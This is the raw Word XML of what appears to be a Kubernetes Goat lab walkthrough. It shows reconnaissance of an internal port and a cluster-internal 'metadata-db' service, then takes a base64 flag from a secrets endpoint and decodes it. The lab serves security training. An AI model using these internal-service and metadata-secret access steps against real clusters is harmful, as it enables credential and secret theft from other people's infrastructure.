      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00071902">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1:1232</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5942929" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="Scenario 3 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enario 3 Welcom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6837"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3095974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00071902">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solution &amp; Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00071902">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRPr="00071902" w:rsidRDefault="00071902" w:rsidP="00071902">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>We can start with enumeration and reconnaissance to understand what services are running in the current instance and other networks based on the available information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also query the current container/pod to see if any other services running by querying the different ports and addresses. Let's query the port </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same container </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with method </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4054631"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="12" name="Picture 12" descr="Scenario 3 intern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enario 3 internal por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054631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRPr="00071902" w:rsidRDefault="00071902" w:rsidP="00071902">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As we can see, it's running some web service and returned the HTTP response as well. So now we have more data/information to further our attack towards more access within the Kubernetes network services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRPr="00071902" w:rsidRDefault="00071902" w:rsidP="00071902">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can see that there is an internal-only exposed service within the cluster called </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>metadata-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, let's a query and see if we can get any more useful information </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://metadata-db</w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4054631"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13" name="Picture 13" descr="Scenario 3 access metadat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enario 3 access metadata servi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054631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After enumerating through the entire key values, finally we can see that there is a flag at </w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>http://metadata-db/latest/secrets/kubernetes-goat</w:t>
      </w:r>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4054631"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="14" name="Picture 14" descr="Scenario 3 access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enario 3 access fla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054631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071902">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>We can decode the returned/obtained base64 flag to see the information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0063209B" w:rsidRDefault="0063209B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>In your Linux machine: -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00071902" w:rsidRDefault="00071902" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 </w:t>
      </w:r>
      <w:r w:rsidR="0063209B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063209B" w:rsidRDefault="0063209B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="351469"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="Scenario 3 decode bas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enario 3 decode base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1469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063209B" w:rsidRPr="0063209B" w:rsidRDefault="0063209B" w:rsidP="00A7708C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> can see that it contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0063209B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Kubernetes Goat flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0063209B" w:rsidRPr="006320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E21BB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="299A3D48"/>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2D1C35B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="299A3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2E39F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B040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71CF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33D0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5616FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="299A3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DAA"/>
    <w:rsid w:val="00071902"/>
    <w:rsid w:val="00120AC6"/>
    <w:rsid w:val="00122ED0"/>
    <w:rsid w:val="002518F6"/>
    <w:rsid w:val="003D277E"/>
    <w:rsid w:val="0063209B"/>
    <w:rsid w:val="00A7708C"/>
    <w:rsid w:val="00C43DAA"/>
    <w:rsid w:val="00C851D1"/>
    <w:rsid w:val="00EC7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81FB0E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB76D36C-1E0B-477F-86E2-A40130F98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43D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20A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DAA"/>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43DAA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C43DAA"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C43DA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20AC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C73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586421523">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="692464056">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="883639600">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="988753033">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1198615322">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1556241245">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1632855430">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1649358671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1988586744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="203518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wnload.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz%20-O%20/tmp/docker-19.03.9.tgz"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hackerone.com/reports/341876" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1231" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.docker.com/linux/static/stable/"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1230"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google.com" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:1232"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1544</TotalTime>
  <Pages>11</Pages>
  <Words>916</Words>
  <Characters>5088</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>146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Ahmed Altaf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Shaikh Ahmed Altaf</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-14T18:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-15T20:00:00Z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250e1af1-4b49-4aff-91aa-c4c862e139a5</vt:lpwstr>
  </property>
</Properties>
</file>